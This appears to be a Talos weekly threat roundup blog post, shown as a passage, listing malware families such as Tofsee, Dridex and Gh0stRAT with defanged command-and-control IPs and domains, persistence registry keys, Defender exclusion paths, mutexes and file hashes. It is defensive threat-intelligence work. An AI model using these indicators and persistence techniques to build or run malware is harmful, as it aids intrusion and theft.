Today, Talos is publishing a glimpse into the most prevalent threats we've observed between March 5 and March 12. As with previous roundups, this post isn't meant to be an in-depth analysis. Instead, this post will summarize the threats we've observed by highlighting key behavioral characteristics, indicators of compromise, and discussing how our customers are automatically protected from these threats. As a reminder, the information provided for the following threats in this post is non-exhaustive and current as of the date of publication. Additionally, please keep in mind that IOC searching is only one part of threat hunting. Spotting a single IOC does not necessarily indicate maliciousness. Detection and coverage for the following threats is subject to updates, pending additional threat or vulnerability analysis. For the most current information, please refer to your Firepower Management Center, Snort.org, or ClamAV.net.

For each threat described below, this blog post only lists 25 of the associated file hashes and up to 25 IOCs for each category. An accompanying JSON file can be found here that includes the complete list of file hashes, as well as all other IOCs from this post. A visual depiction of the MITRE ATT&CK techniques associated with each threat is also shown. In these images, the brightness of the technique indicates how prevalent it is across all threat files where dynamic analysis was conducted. There are five distinct shades that are used, with the darkest indicating that no files exhibited technique behavior and the brightest indicating that technique behavior was observed from 75 percent or more of the files.

The most prevalent threats highlighted in this roundup are:

Threat NameTypeDescription
Win.Packed.Tofsee-9840179-0 Packed Tofsee is multi-purpose malware that features a number of modules used to carry out various activities such as sending spam messages, conducting click fraud, mining cryptocurrency, and more. Infected systems become part of the Tofsee spam botnet and are used to send large volumes of spam messages in an effort to infect additional systems and increase the overall size of the botnet under the operator's control.
Win.Packed.Dridex-9839033-1 Packed Dridex is a well-known banking trojan that aims to steal credentials and other sensitive information from an infected machine.
Win.Trojan.Johnnie-9838888-0 Trojan Johnnie, also known as Mikey, is a malware family that focuses on persistence and is known for its plugin architecture.
Win.Downloader.Razy-9839515-0 Downloader Razy is oftentimes a generic detection name for a Windows trojan. It collects sensitive information from the infected host and encrypts the data, and then sends it to a command and control (C2) server. Information collected may include screenshots. The samples modify auto-execute functionality by setting and creating a value in the registry for persistence.
Win.Malware.Zusy-9839004-0 Malware Zusy, also known as TinyBanker or Tinba, is a trojan that uses man-in-the-middle attacks to steal banking information. When executed, it injects itself into legitimate Windows processes such as "explorer.exe" and "winver.exe". When the user accesses a banking website, it displays a form to trick the user into submitting personal information.
Win.Malware.Cerber-9839041-0 Malware Cerber is ransomware that encrypts documents, photos, databases and other important files. Historically, this malware would replace files with encrypted versions and add the file extension ".cerber," although in more recent campaigns, other file extensions are used.
Win.Packed.CoinMiner-9839148-1 Packed This malware installs and executes cryptocurrency mining software. You can read more about this kind of threat on our blog /blocking-cryptomining.
Win.Malware.Gh0stRAT-9839666-0 Malware Gh0stRAT is a well-known family of remote access trojans designed to provide an attacker with complete control over an infected system. Capabilities include monitoring keystrokes, collecting video footage from the webcam, and uploading/executing follow-on malware. The source code for Gh0stRAT has been publicly available on the Internet for years, significantly lowering the barrier for actors to modify and reuse the code in new attacks.
Win.Trojan.Zegost-9840060-0 Trojan Zegost, also known as Zusy, uses man-in-the-middle attacks to steal banking information. When executed, it injects itself into legitimate Windows processes such as "explorer.exe" and "winver.exe." When the user accesses a banking website, it displays a form to trick the user into submitting personal information.

Threat Breakdown

Win.Packed.Tofsee-9840179-0

Indicators of Compromise

  • IOCs collected from dynamic analysis of 132 samples
Registry KeysOccurrences
<HKU>\.DEFAULT\CONTROL PANEL\BUSES 130
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\<random, matching '[A-Z0-9]{8}'> 130
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\<random, matching '[A-Z0-9]{8}'>
Value Name: Type
130
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\<random, matching '[A-Z0-9]{8}'>
Value Name: Start
130
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\<random, matching '[A-Z0-9]{8}'>
Value Name: ErrorControl
130
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\<random, matching '[A-Z0-9]{8}'>
Value Name: DisplayName
130
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\<random, matching '[A-Z0-9]{8}'>
Value Name: WOW64
130
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\<random, matching '[A-Z0-9]{8}'>
Value Name: ObjectName
130
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\<random, matching '[A-Z0-9]{8}'>
Value Name: Description
130
<HKU>\.DEFAULT\CONTROL PANEL\BUSES
Value Name: Config0
130
<HKU>\.DEFAULT\CONTROL PANEL\BUSES
Value Name: Config1
130
<HKU>\.DEFAULT\CONTROL PANEL\BUSES
Value Name: Config2
129
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\<random, matching '[A-Z0-9]{8}'>
Value Name: ImagePath
25
<HKLM>\SOFTWARE\MICROSOFT\WINDOWS DEFENDER\EXCLUSIONS\PATHS
Value Name: C:\Windows\SysWOW64\haoutbhw
9
<HKLM>\SOFTWARE\MICROSOFT\WINDOWS DEFENDER\EXCLUSIONS\PATHS
Value Name: C:\Windows\SysWOW64\ohvbaiod
9
<HKLM>\SOFTWARE\MICROSOFT\WINDOWS DEFENDER\EXCLUSIONS\PATHS
Value Name: C:\Windows\SysWOW64\exlrqyet
8
<HKLM>\SOFTWARE\MICROSOFT\WINDOWS DEFENDER\EXCLUSIONS\PATHS
Value Name: C:\Windows\SysWOW64\tmagfnti
8
<HKLM>\SOFTWARE\MICROSOFT\WINDOWS DEFENDER\EXCLUSIONS\PATHS
Value Name: C:\Windows\SysWOW64\gzntsagv
7
<HKLM>\SOFTWARE\MICROSOFT\WINDOWS DEFENDER\EXCLUSIONS\PATHS
Value Name: C:\Windows\SysWOW64\wpdjiqwl
7
<HKLM>\SOFTWARE\MICROSOFT\WINDOWS DEFENDER\EXCLUSIONS\PATHS
Value Name: C:\Windows\SysWOW64\buionvbq
7
<HKLM>\SOFTWARE\MICROSOFT\WINDOWS DEFENDER\EXCLUSIONS\PATHS
Value Name: C:\Windows\SysWOW64\piwcbjpe
6
<HKLM>\SOFTWARE\MICROSOFT\WINDOWS DEFENDER\EXCLUSIONS\PATHS
Value Name: C:\Windows\SysWOW64\athnmuap
5
<HKLM>\SOFTWARE\MICROSOFT\WINDOWS DEFENDER\EXCLUSIONS\PATHS
Value Name: C:\Windows\SysWOW64\zsgmltzo
5
<HKLM>\SOFTWARE\MICROSOFT\WINDOWS DEFENDER\EXCLUSIONS\PATHS
Value Name: C:\Windows\SysWOW64\lesyxfla
5
<HKLM>\SOFTWARE\MICROSOFT\WINDOWS DEFENDER\EXCLUSIONS\PATHS
Value Name: C:\Windows\SysWOW64\yrflksyn
5
IP Addresses contacted by malware. Does not indicate maliciousnessOccurrences
43[.]231[.]4[.]7 130
185[.]254[.]190[.]218 130
217[.]172[.]179[.]54 129
5[.]9[.]72[.]48 129
130[.]0[.]232[.]208 129
144[.]76[.]108[.]82 129
185[.]253[.]217[.]20 129
45[.]90[.]34[.]87 129
157[.]240[.]18[.]174 128
172[.]217[.]6[.]196 118
104[.]47[.]9[.]33 91
64[.]233[.]186[.]26/31 86
172[.]217[.]197[.]26/31 86
104[.]47[.]8[.]33 85
74[.]125[.]128[.]26/31 85
209[.]85[.]202[.]26/31 80
172[.]253[.]120[.]26/31 80
37[.]1[.]217[.]172 65
87[.]250[.]250[.]22 61
104[.]111[.]240[.]250 60
216[.]239[.]38[.]21 57
216[.]239[.]36[.]21 53
163[.]172[.]32[.]74 43
142[.]250[.]64[.]99 35
216[.]239[.]34[.]21 34

*See JSON for more IOCs

Domain Names contacted by malware. Does not indicate maliciousnessOccurrences
249[.]5[.]55[.]69[.]in-addr[.]arpa 130
microsoft-com[.]mail[.]protection[.]outlook[.]com 130
microsoft[.]com 130
schema[.]org 129
249[.]5[.]55[.]69[.]bl[.]spamcop[.]net 129
249[.]5[.]55[.]69[.]cbl[.]abuseat[.]org 129
249[.]5[.]55[.]69[.]dnsbl[.]sorbs[.]net 129
249[.]5[.]55[.]69[.]sbl-xbl[.]spamhaus[.]org 129
249[.]5[.]55[.]69[.]zen[.]spamhaus[.]org 129
accounts[.]google[.]com 129
drive[.]google[.]com 129
mail[.]google[.]com 129
maps[.]google[.]com 129
news[.]google[.]com 129
play[.]google[.]com 129
www[.]google[.]com 129
www[.]youtube[.]com 129
www[.]instagram[.]com 128
gmail-smtp-in[.]l[.]google[.]com 91
alt4[.]gmail-smtp-in[.]l[.]google[.]com 91
alt1[.]gmail-smtp-in[.]l[.]google[.]com 88
alt3[.]gmail-smtp-in[.]l[.]google[.]com 82
alt2[.]gmail-smtp-in[.]l[.]google[.]com 81
www[.]amazon[.]com 77
work[.]a-poster[.]info 65

*See JSON for more IOCs

Files and or directories createdOccurrences
%SystemRoot%\SysWOW64\config\systemprofile 130
%SystemRoot%\SysWOW64\config\systemprofile:.repos 130
%SystemRoot%\SysWOW64\<random, matching '[a-z]{8}'> 128
%TEMP%\<random, matching '[a-z]{8}'>.exe 127
%System32%\config\systemprofile:.repos 25
%System32%\<random, matching '[a-z]{8}\[a-z]{6,8}'>.exe (copy) 21
%TEMP%\uwrxqdn.exe 2
%TEMP%\oqlrkxh.exe 2
%TEMP%\supvobl.exe 1
%TEMP%\fhciboy.exe 1
%System32%\gcshmqs\nmacqnog.exe (copy) 1
%System32%\tbnresb\jddufofh.exe (copy) 1
%System32%\zkqqcbe\ygvzmktt.exe (copy) 1
%System32%\desthnb\jmsmbmxd.exe (copy) 1

File Hashes

00305b6f95fb468efa361c4fe36eeeea6263ac12b5cae5cd03d2e26551bd510d
02182da985ca07c7d0d9bf7d40bae94aa976bd0a2430138ebc7e63d13df9b42e
02733f819a43eb2745e819953a805f74f75ef789d5bfbea890462f30a9656e21
033498472f23de3eb5abddd3d99c33bf8d807f87a74b4afbd7aee8db9db9b74b
09ac45df86d51c009833d0745fae4b78caeb0a57431ee76bcd52a62d9362695e
09c32ef2aed8dbf1e6184e51ba34c1e6535e1d728c70d0c90d9feed3bcbb31eb
0ab3ff42a1ebe020b44e710208c7640374667c35280a9aec47e856091b0ac934
0bf22411e9065c63087afde54d2586014fb1ee1f7201d59d000f543df1959d8d
0bfbcaaed441364b336b5d06cb18dde7bb7106803c525bb22f77e4b611e2c1ad
0dec48147113d5a1591618a52358360ea46f3a27856d25ae3c8d89d3fa3926f3
10921f8723a8e237fdac4ddfecbf94e8c46398d9adebd4a53ec61f8f45e37d9f
10eb31f470d95326966626d979cfc2232f84edefcf24615d99c182172944daa9
165643e665fc979772419a05da7431f26faab06f0c02ebd880212227dfc63501
1a2df80b9f94c430c80394c7e401dfdbc1c5aabd224f174a55795225b5a21ca4
1a55c8046e88590907c43a82bd57862a5f8c9d1ab596e5bfc49cdd15e3c9414e
1cf6ab91afddbe934604b232843bbc757ec5d771e189bf551afaae6ab831dcbf
1d0a7c56dd01b50b2c9732d5ce6861573d33ce3fb85e88d281bdc5ef33996e42
1f9bdb13720ccd6f7ea99022ed50e80e0c2f87ca26d523515e2a9edccbba88aa
2202315c60478202e2f9e1c2182d3361deffdf709fab380445b2d5aac3ac274f
222504b2dbb00293eed70cdd3d6038f65f1b1b0b47311c197c2fd0a40c298626
22d785a72c063f95c0a11d0005cf3a81a86f5686c1cfd7e574160e02bc02acff
2e2c086f3f1b56acbc3cb68190d83332a2d1d0061c8c1344cd624ded6d80c31f
30b458c45427e82c3f53cef7c812fa5a23de9242d3fd5be46f8bf70cbdb3c2b5
30df5a09609ba69522a5483b500abc3a587534d5556c4ec0e5e5c9fa1602ecb8
34aa9486155e3043004ec5c45f1ad49b0191a9c771687d7f4cf20f24ef446faa

*See JSON for more IOCs

Coverage

ProductProtection
AMP This has coverage
Cloudlock N/A
CWS This has coverage
Email Security This has coverage
Network Security This has coverage
Stealthwatch N/A
Stealthwatch Cloud N/A
Threat Grid This has coverage
Umbrella N/A
WSA This has coverage

Screenshots of Detection

AMP


ThreatGrid


MITRE ATT&CK


Win.Packed.Dridex-9839033-1

Indicators of Compromise

  • IOCs collected from dynamic analysis of 25 samples
Registry KeysOccurrences
<HKLM>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUNONCE
Value Name: trkcore
25
<HKLM>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\POLICIES\SYSTEM
Value Name: DisableTaskMgr
25
MutexesOccurrences
<random, matching [A-Z0-9]{10}> 25
IP Addresses contacted by malware. Does not indicate maliciousnessOccurrences
172[.]217[.]11[.]14 25
104[.]23[.]99[.]190 12
104[.]23[.]98[.]190 7
173[.]194[.]175[.]138/31 6
23[.]3[.]13[.]88 4
173[.]194[.]175[.]113 3
173[.]194[.]175[.]102 3
23[.]3[.]13[.]154 2
173[.]194[.]175[.]100/31 2
104[.]18[.]10[.]39 1
Domain Names contacted by malware. Does not indicate maliciousnessOccurrences
pastebin[.]com 25
w[.]google[.]com 25
www3[.]l[.]google[.]com 14
www[.]y9fapyp2uj[.]com 1
www[.]zfonb8mzne[.]com 1
www[.]wqcet3q9xk[.]com 1
www[.]x2mtleacte[.]com 1
www[.]uulwhfrn1y[.]com 1
www[.]x7nzjt3faq[.]com 1
www[.]yv3pcwfezq[.]com 1
www[.]1a0oqiraht[.]com 1
www[.]f7e6qiazk3[.]com 1
www[.]8e5zciqqo3[.]com 1
www[.]ikdappafza[.]com 1
www[.]sakjgai9ve[.]com 1
www[.]weyfiyrfb2[.]com 1
www[.]l0ms363fcy[.]com 1
www[.]daazceg7iv[.]com 1
www[.]kfu2bhdpqy[.]com 1
www[.]ladghllkjr[.]com 1
www[.]ekri9xvgvw[.]com 1
www[.]xye3nljvn9[.]com 1
www[.]nt8dlgd5yd[.]com 1
www[.]wupojupilw[.]com 1
www[.]wv6tzcb7m9[.]com 1

*See JSON for more IOCs

Files and or directories createdOccurrences
<malware cwd>\old_<malware exe name> (copy) 25
%ProgramData%\Microsoft\Windows\SystemData\S-1-5-18\ReadOnly\LockScreen_Z\LockScreen___1024_0768_notdimmed.jpg (copy) 4
%ProgramData%\Microsoft\Windows\SystemData\S-1-5-18\ReadOnly\LockScreen_Z\~ockScreen___1024_0768_notdimmed.tmp 4
\Temp\HncDownload\Update.log 2

File Hashes

11d6226a43b561c61c0211d6be11053985fdda41f0774b9caf8fad9428e16a25
237b0da5c88b3a24c8b00ec0de70dbaf6c8280422a054d895490be691dfbb528
2b18f5b1b12cf9656bd62ad456d693c17a2dd64b1d7af0fe58d106e228ae3e7b
2fe60e63e64232a17cbaaa15f74398a070adcd76f94011f7e5784196a9ebede5
37421f2cbaf63bde73ebf8cdf5a430e156da5b2ce40b19c162f1d60ceb9d9eea
396258a0381d41eff013b8f217c9aea683c14f667f0c0dc7fc910c149ccd1f8c
3a9b6580a44be0c46544948de114ed5e12ccc002e08f45a2e64e7426f1e96601
4309a0ab2fefad0c8cf748c967cd9fbda709c98e41abe190ebae020dd4e887b2
469a9746eb71de48ceddd2e9392aca08944f9b8eebdf31332beafa04d0a66081
4d19355466e55389756550fc14abbed6975a43b7fc8665cea6ea707a44e5ac7a
536f012eeb2136862e07cd38703496d25c3c1c10949921e041b3077db1786d59
5f66be3e8f218b9528da13b07d8a697119c21dc763291c27f408a414a95a9241
6aa4dc0371cc3e771f6a27002bff6fba8906dc39db26a5d3fb0825e66e0236da
76de64d1ed2d2f04795bc43f63badc27d7b48c7e8b1f27409c2c16687feedc07
7c077eb11002169946f729624995495d1edde48877fd0f4949e01891fd35e38a
865f36e11c8a8812b16d0ac8ea44aa9a143593a9bbb00741f2a3a35a4b45f3a0
86668617ee269dc4757a89fc0db9288df10c20f18e765cf4a77ec71903a26af2
9668eaee38d04c3e72edba9400ba112f8ad33fe4b535bf54f417cc151412f30d
9d506eeadfcd1bdf5168975747b4616fa404eaa1b099fe34dcdce225406b7812
a2cdd6f858234629734fb7453fc50e79e4b682e424a784b22e4118abaad626d5
abe6ecae66ac6b1f4133a131520089e608a3d7f6aa3ca7fd4864011c63bf3327
c24492f2c6e9ede38240a0b441175d21381d19f1d8a62d1eb5769e08bdc07544
c59f7f232ef0c0afe7112d2a31c3eaff3a11060d3f92d47124c3a3863607bf7f
d7cad9a53620bfca1eb2525a9349e3bacd8d125d9008ce62a949ef9a44328189
dd6f0f62f4e8beb88de8214ac0fc59c11519be83db1daaee82e566ee3eedf845

*See JSON for more IOCs

Coverage

ProductProtection
AMP This has coverage
Cloudlock N/A
CWS This has coverage
Email Security This has coverage
Network Security This has coverage
Stealthwatch N/A
Stealthwatch Cloud N/A
Threat Grid This has coverage
Umbrella N/A
WSA N/A

Screenshots of Detection

AMP


ThreatGrid


MITRE ATT&CK


Win.Trojan.Johnnie-9838888-0

Indicators of Compromise

  • IOCs collected from dynamic analysis of 19 samples
Registry KeysOccurrences
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
Value Name: ProPlayer
9
<HKU>\S-1-5-21-2580483871-590521980-3826313501-500
Value Name: di
2
<HKCU>\ENVIRONMENT
Value Name: SEE_MASK_NOZONECHECKS
1
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\WINLOGON
Value Name: ParseAutoexec
1
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\EXPLORER\FILEEXTS\OPENWITHLIST 1
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
Value Name: Windir
1
<HKCU>\SOFTWARE\NETFLIX 1
<HKCU>\SOFTWARE\NETFLIX
Value Name: FirstExecution
1
<HKCU>\SOFTWARE\NETFLIX
Value Name: NewIdentification
1
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
Value Name: Java
1
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
Value Name: ProPlayerX
1
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
Value Name: UpdateManager
1
<HKCU>\SOFTWARE\93BEDF521AC945 1
<HKCU>\SOFTWARE\93BEDF521AC945
Value Name: [kl]
1
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
Value Name: RuntimeBroker
1
MutexesOccurrences
e9c1286a28d82a2d0ee6 2
7868gyiugbio 2
Windows 1
_x_X_UPDATE_X_x_ 1
_x_X_BLOCKMOUSE_X_x_ 1
_x_X_PASSWORDLIST_X_x_ 1
***MUTEX***_SAIR 1
***MUTEX*** 1
2AC1A572DB6944B0A65C38C4140AF2F47d472647490 1
2AC1A572DB6944B0A65C38C4140AF2F47d4726474A4 1
2AC1A572DB6944B0A65C38C4140AF2F47d4726474CC 1
2AC1A572DB6944B0A65C38C4140AF2F47d47264758C 1
2AC1A572DB6944B0A65C38C4140AF2F47d4726476DC 1
2AC1A572DB6944B0A65C38C4140AF2F47d472647710 1
2AC1A572DB6944B0A65C38C4140AF2F47d472647750 1
2AC1A572DB6944B0A65C38C4140AF2F47d472647828 1
2AC1A572DB6944B0A65C38C4140AF2F47d4726478B0 1
4M9691 1
Global\a4e40ac0-7cfb-11eb-b5f8-00501e3ae7b6 1
2AC1A572DB6944B0A65C38C4140AF2F47d4741B6134 1
QSR_MUTEX_8J5zgiUkz6aC2r23ow 1
QSR_MUTEX_N5906JU6VgxV3XlvX0 1
Global\bda31061-7cfb-11eb-b5f8-00501e3ae7b6 1
93bedf521ac945 1
IP Addresses contacted by malware. Does not indicate maliciousnessOccurrences
208[.]95[.]112[.]1 5
41[.]214[.]187[.]35 4
23[.]105[.]131[.]235 3
104[.]140[.]201[.]42 2
172[.]111[.]154[.]46 2
104[.]140[.]244[.]186 1
173[.]194[.]207[.]102 1
23[.]6[.]69[.]99 1
209[.]85[.]232[.]155 1
140[.]82[.]114[.]4 1
20[.]36[.]253[.]92 1
65[.]55[.]44[.]109 1
151[.]101[.]250[.]217 1
23[.]218[.]140[.]208 1
35[.]244[.]181[.]201 1
34[.]107[.]221[.]82 1
34[.]216[.]80[.]151 1
185[.]199[.]109[.]133 1
160[.]20[.]145[.]218 1
34[.]215[.]65[.]187 1
99[.]84[.]208[.]128 1
70[.]113[.]1[.]76 1
35[.]168[.]178[.]126 1
Domain Names contacted by malware. Does not indicate maliciousnessOccurrences
ip-api[.]com 5
hicham157484[.]ddns[.]net 4
newanonjoe[.]ddns[.]net 3
pool[.]supportxmr[.]com 2
pool-nyc[.]supportxmr[.]com 2
multii[.]ddns[.]net 2
github[.]com 1
e11290[.]dspg[.]akamaiedge[.]net 1
prod[.]balrog[.]prod[.]cloudops[.]mozgcp[.]net 1
prod[.]detectportal[.]prod[.]cloudops[.]mozgcp[.]net 1
shavar[.]prod[.]mozaws[.]net 1
search[.]r53-2[.]services[.]mozilla[.]com 1
d1zkz3k4cclnv6[.]cloudfront[.]net 1
e13630[.]dscb[.]akamaiedge[.]net 1
detectportal[.]firefox[.]com 1
aus5[.]mozilla[.]org 1
search[.]services[.]mozilla[.]com 1
go[.]microsoft[.]com 1
shavar[.]services[.]mozilla[.]com 1
tracking-protection[.]cdn[.]mozilla[.]net 1
docs[.]microsoft[.]com 1
wcpstatic[.]microsoft[.]com 1
www-google-analytics[.]l[.]google[.]com 1
www[.]google-analytics[.]com 1
w[.]usabilla[.]com 1

*See JSON for more IOCs

Files and or directories createdOccurrences
%APPDATA%\ProPlayer 9
%APPDATA%\ProPlayer\Player.exe.exe 9
%APPDATA%\Logs\03-04-2021 5
%TEMP%\~PI<random, matching [A-F0-9]{2,4}>.tmp 3
%APPDATA%\Logs 2
%APPDATA%\Microsoft\Windows\Start Menu\Programs\Startup\yGtjmGiLEP.url 2
%ProgramData%\IGPNMyGXrV 2
%ProgramData%\IGPNMyGXrV\cfg 2
%ProgramData%\IGPNMyGXrV\cfgi 2
%ProgramData%\IGPNMyGXrV\nslookup 2
%ProgramData%\IGPNMyGXrV\r.vbs 2
%APPDATA%\Windir 2
%APPDATA%\RuntimeBroker 2
%APPDATA%\logs.dat 1
%TEMP%\UuU.uUu 1
%TEMP%\XX--XX--XX.txt 1
%TEMP%\XxX.xXx 1
%APPDATA%\Microsoft\Windows\Start Menu\Programs\Startup\Windows.lnk 1
%APPDATA%\Windir\windir.exe 1
%TEMP%\j5Dvp.exe 1
%APPDATA%\RuntimeBroker\RuntimeBroker.exe.exe 1
%TEMP%\QCIGY.JPG 1
%TEMP%\eSYby.jpg 1
%APPDATA%\ProPlayerX\PlayerX.exe.exe 1
%APPDATA%\Microsoft\Windows\Templates\Windows.lnk 1

*See JSON for more IOCs

File Hashes

017283a74e46d4d1e3e725cd56e1afeb1ee54068b7f71032db25fec31d68d1b2
31cc204b627e09a0cb4bc8b2091742c448837a9be8021d70cd84b308f16dec38
31f400e041c61d1aa2337d6beb74a853a31ac6fe5c26af63e7b76123050e6265
3a3205b31ee1f99fb887ce5c7d724b8fae13dc9689ca0509489345f7a2f43647
3b5f97b5c404c22bad550e105a9154234d43c13e4b32f3738dd1d29d0b67e8cf
421431abe3f3bc0d459ca27b9f36e6ad9e5bc256a46a418b32b49bdcae394072
505511c169de43c71e439a82ef3a821707e1b698382b4c41f05bcc3b9a14e5c7
5992c6bba20eb7a5a6fc7d2d66c793b57d76bd0c78c39258c4fbd5d8dcf78403
638091106e8dce738402e1d548b4e55704e31e59b4168ff7699f9fbc2a5fb3c4
7e8df264b1aa78a5eff69c18bc45b62c37ee32929e2bf47a00bc2ad1959cc58c
ad24d52cb8be574ab4d2a3746dd1bfb4584b2545cdcd07e6e078096ff0e78ab6
b201a936c0dfb4f9d87e9667e4356ba0cf311c6695487c000c4664c4ae4aa773
b7483ac9d0804aa72996c24c8307d72d664cf5914df5f377e27667ba117dde8a
be29f8623a1cf4314dae4e05fa9d5b5ee61eec16b7b7a686fa5890ae3e828da7
c2c7d89d7b4b3042052bcbaa5407d034c5d539721e1b8653231eddd754cc27fb
d9c88ac60b7d13db8646d7929d6bbdd7f9344ce22f5951ff8a2a85b65bff3dc5
de7a7371e0113b3b8ca14ce1683824898ee5f3044caec9c550436d43bbd57cf5
df75e5465189a11a4640c9e9bd30ae3aa37bb9f6c607fff2371351bf08a97412
fd731b97e8ec6140e434e09a69903a718b2bcc99d33def43800acaaa7397b04c

Coverage

ProductProtection
AMP This has coverage
Cloudlock N/A
CWS This has coverage
Email Security This has coverage
Network Security This has coverage
Stealthwatch N/A
Stealthwatch Cloud N/A
Threat Grid This has coverage
Umbrella N/A
WSA This has coverage

Screenshots of Detection

AMP


ThreatGrid


MITRE ATT&CK


Win.Downloader.Razy-9839515-0

Indicators of Compromise

  • IOCs collected from dynamic analysis of 24 samples
IP Addresses contacted by malware. Does not indicate maliciousnessOccurrences
199[.]101[.]134[.]236/31 16
74[.]117[.]178[.]56 13
74[.]117[.]178[.]90 13
199[.]101[.]134[.]234/31 12
74[.]117[.]178[.]93 9
74[.]117[.]178[.]58 7
200[.]147[.]3[.]199 5
200[.]147[.]100[.]53 3
200[.]147[.]35[.]224 2
199[.]80[.]53[.]87 2
74[.]117[.]178[.]19 2
74[.]117[.]178[.]45 2
74[.]117[.]178[.]62 2
199[.]101[.]133[.]31 2
199[.]101[.]133[.]171 2
74[.]117[.]178[.]66 1
199[.]101[.]133[.]9 1
200[.]98[.]206[.]229 1
Domain Names contacted by malware. Does not indicate maliciousnessOccurrences
www[.]youtube[.]com 19
twitter[.]com 19
www[.]facebook[.]com 19
plus[.]google[.]com 19
blog[.]4shared[.]com 19
e[.]4shared[.]com 19
static[.]4shared[.]com 19
www[.]4shared[.]com 19
dc180[.]4shared[.]com 8
dc270[.]4shared[.]com 8
dc317[.]4shared[.]com 8
dc361[.]4shared[.]com 8
dc424[.]4shared[.]com 8
dc242[.]4shared[.]com 7
dc313[.]4shared[.]com 7
e[.]indice[.]uol[.]com[.]br 5
dc185[.]4shared[.]com 5
dc239[.]4shared[.]com 5
dc253[.]4shared[.]com 5
dc441[.]4shared[.]com 5
ricolombard[.]sites[.]uol[.]com[.]br 4
dc280[.]4shared[.]com 3
amazonas[.]uol[.]com[.]br 2
gmbrum[.]sites[.]uol[.]com[.]br 1
dc249[.]4shared[.]com 1

*See JSON for more IOCs

Files and or directories createdOccurrences
%SystemRoot%\SysWOW64\<random, matching '[a-zA-Z0-9]{4,19}'>.exe 12
%SystemRoot%\SysWOW64\dosxa.exe 9
%SystemRoot%\SysWOW64\amd.exe 8
%System32%\amd.exe 8
%System32%\dosxa.exe 8
%SystemRoot%\SysWOW64\dossa.exe 7
%System32%\GetDiskSerial.dll 6
%System32%\dossa.exe 6
%SystemRoot%\SysWOW64\GetDiskSerial.dll 5
%SystemRoot%\SysWOW64\msngrss.exe 5
%SystemRoot%\SysWOW64\lisa.dll 5
%SystemRoot%\SysWOW64\sm.bat 5
%SystemRoot%\SysWOW64\sm.dll 5
%System32%\msngrss.exe 5
%System32%\lisa.dll 5
%System32%\sm.bat 5
%System32%\sm.dll 5
%SystemRoot%\SysWOW64\lic.dll 4
%SystemRoot%\SysWOW64\sma.dll 4
%System32%\lic.dll 4
%System32%\sma.dll 4
%System32%\drivers\etc\hosts 3
%System32%\sUvycDUb.exe 3
%SystemRoot%\SysWOW64\BCxpO.dll 2
%SystemRoot%\SysWOW64\sUvycDUb.dll 2

*See JSON for more IOCs

File Hashes

206ad2bbcb0e657147eccf43b1f806b81e3112127c0183f9cf050c56e3793762
2561bdb6d7c159984c98789097ddaf443e38cedaa065c0ea3b0da24165b70eaf
2c5bb90334b2297bd26eec4b45e6f60870d81b4ff9d977f1bdb4933aaf9bf8f4
2f52497d3a45d32f1813c0cee483bbeb8cf3d554a9bcb4788dfa9e9a37c0b477
3a969338c7a9c40b97bd9b0bd0e9e9273f276426b66dde92f5ea8e229cefcd71
458e47bdba508e9889c4f48d72dba211e584d0cc11ce9496e432dc7f59b4dccc
4653edea094d12db90e75bbcbc3d4e36aa71a54591a349a31a633cf7f60e791a
46ff19285cb9c24d3af166064773f03373d15272433211f834aa10cace6061d2
5844e36f5e2b19d6cf3ca208233c41321c0332d2b271ba85b7e7ee4f3dd4d78a
59e29402208ac6dc78b246f995f7695ff7b5ce171586afcfdcc37dda13be0215
6212b991246c25301c634fa3175bfbcbbf9030bb19e3b4e04f1151aad593ce9b
6d53dde19dfa964e31946dfd09eb27ad5b43c0964adcb886f9e82e3496d84286
8240f8439ec16092e8ee9388b99492107f2fc421ec989a6297da67ee4a387112
8a3cf3ec592d731fc6157fc02fbdc7cb0de91317a17527d81e0cc0755de4a8d9
981520da05b189d3519b5457c8139891e006eeac49d2678469206de623987534
992e31fb189136008f25e95790a084ac6125ceb1eb96174966ebb0d2ebd75b07
9dd299506a282005ff310adfbbd288f76a2e288292dd81985bcf2d12387017d8
c892d82c868bd4ffd0f03c0c94af54dc514702fc93af4ff7da0968e5a8cf1fa8
cc0fef3ceb300a969bfeee67e75535d325b9f09aa1d44a2006287b0da3792b53
e0a240fffb85a579cc377c7bae06b9d2ec1d866dd3618ca5930b748cd5124165
eb08ddc9550ef3c9ee77408519cf99ac10db01ae77f0eb724926d4341415361e
f4fa5297895b6d0bd3f6d48f26c9b53e53d02160e5d6f44181fd7052063151f9
f81998b4e0981f6cb94e050090ce6f651d0e0900cdaaaefe79b14b2b256d1ca9
f8bf1e624480aa3d7a02c6b49706784a7dfebb6b2824852e1d9a030f15780cf6

Coverage

ProductProtection
AMP This has coverage
Cloudlock N/A
CWS This has coverage
Email Security This has coverage
Network Security N/A
Stealthwatch N/A
Stealthwatch Cloud N/A
Threat Grid This has coverage
Umbrella N/A
WSA N/A

Screenshots of Detection

AMP


ThreatGrid


MITRE ATT&CK


Win.Malware.Zusy-9839004-0

Indicators of Compromise

  • IOCs collected from dynamic analysis of 25 samples
Registry KeysOccurrences
<HKLM>\SOFTWARE\CLASSES\C4070} 2
<HKLM>\SOFTWARE\CLASSES\C4070} 2
<HKLM>\SOFTWARE\CLASSES\2..42AC 2
<HKLM>\SOFTWARE\CLASSES\2..42AC 2
<HKLM>\SOFTWARE\CLASSES\C4070}
